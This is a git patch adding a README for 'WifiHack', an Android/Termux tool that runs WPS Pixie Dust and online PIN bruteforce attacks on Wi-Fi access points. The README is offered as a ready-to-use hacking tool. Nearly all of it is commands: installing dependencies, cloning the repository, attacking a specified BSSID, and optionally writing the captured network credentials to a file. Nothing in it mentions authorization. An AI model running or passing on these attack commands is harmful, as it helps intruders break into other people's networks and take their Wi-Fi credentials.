From c28979c46009f45a9d00922344927412cc382f54 Mon Sep 17 00:00:00 2001
From: FARHAN-SUPERUSERS <124022055+Gtajisan@users.noreply.github.com>
Date: Mon, 25 Sep 2023 22:40:48 +0600
Subject: [PATCH] Add files via upload
---
README.md | 93 +++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 93 insertions(+)
create mode 100644 README.md
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..83d7a27
--- /dev/null
+++ b/README.md
@@ -0,0 +1,93 @@
+
+### Hack WIfi Using Termux! (Requires Root)
+
+
+## [Termux](https://termux.com/)
+Please note that root access is required.
+
+### Manually
+**Installing requirements**
+ ```
+ pkg install -y root-repo
+ ```
+ ```
+ pkg install -y git tsu python wpa-supplicant pixiewps iw openssl
+ ```
+### Getting WifiHack
+ ```
+ git clone --depth 1 https://github.com/Gtajisan/WifiHack
+ ```
+ ```
+ cd WifiHack
+ ```
+### Running
+ ```
+ sudo python farhan.py -i wlan0 -K
+ ```
+### One line Command
+ ```
+ sudo python WifiHack/farhan.py -i wlan0 -K
+ ```
+
+# Usage
+```
+ farhan.py
+ Required arguments:
+ -i, --interface= : Name of the interface to use
+
+ Optional arguments:
+ -b, --bssid= : BSSID of the target AP
+ -p, --pin= : Use the specified pin (arbitrary string or 4/8 digit pin)
+ -K, --pixie-dust : Run Pixie Dust attack
+ -B, --bruteforce : Run online bruteforce attack
+ --push-button-connect : Run WPS push button connection
+
+ Advanced arguments:
+ -d, --delay= : Set the delay between pin attempts [0]
+ -w, --write : Write AP credentials to the file on success
+ -F, --pixie-force : Run Pixiewps with --force option (bruteforce full range)
+ -X, --show-pixie-cmd : Alway print Pixiewps command
+ --vuln-list= : Use custom file with vulnerable devices list ['vulnwsc.txt']
+ --iface-down : Down network interface when the work is finished
+ -l, --loop : Run in a loop
+ -r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays
+ --mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
+ (for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
+ -v, --verbose : Verbose output
+ ```
+
+## Usage examples
+Start Pixie Dust attack on a specified BSSID:
+ ```
+ sudo python3 farhan.py -i wlan0 -b 00:90:4C:C1:AC:21 -K
+ ```
+Show avaliable networks and start Pixie Dust attack on a specified network:
+ ```
+ sudo python3 farhan.py -i wlan0 -K
+ ```
+Launch online WPS bruteforce with the specified first half of the PIN:
+ ```
+ sudo python3 farhan.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234
+ ```
+ Start WPS push button connection:s
+ ```
+ sudo python3 farhan.py -i wlan0 --pbc
+ ```
+## Troubleshooting
+#### "RTNETLINK answers: Operation not possible due to RF-kill"
+ Just run:
+```sudo rfkill unblock wifi```
+#### "Device or resource busy (-16)"
+ Try disabling Wi-Fi in the system settings and kill the Network manager. Alternatively, you can try running OneShot with ```--iface-down``` argument.
+#### The wlan0 interface disappears when Wi-Fi is disabled on Android devices with MediaTek SoC
+ Try running WifiHack with the `--mtk-wifi` flag to initialize Wi-Fi device driver.
+# Acknowledgements
+## Special Than all root users
+* FARHAN X ME
+## [Facebook](https://www.facebook.com/profile.php?id=100094924471568&mibextid=ZbWKwL)
+
+## [Whatsapp](https://wa.me/+880130505723*)
+
+## Thanks For Using This Tool πΈπ
+## ki obsta π€‘
+## cd WifiHack sudo python WifiHack/farhan.py -i wlan0 -K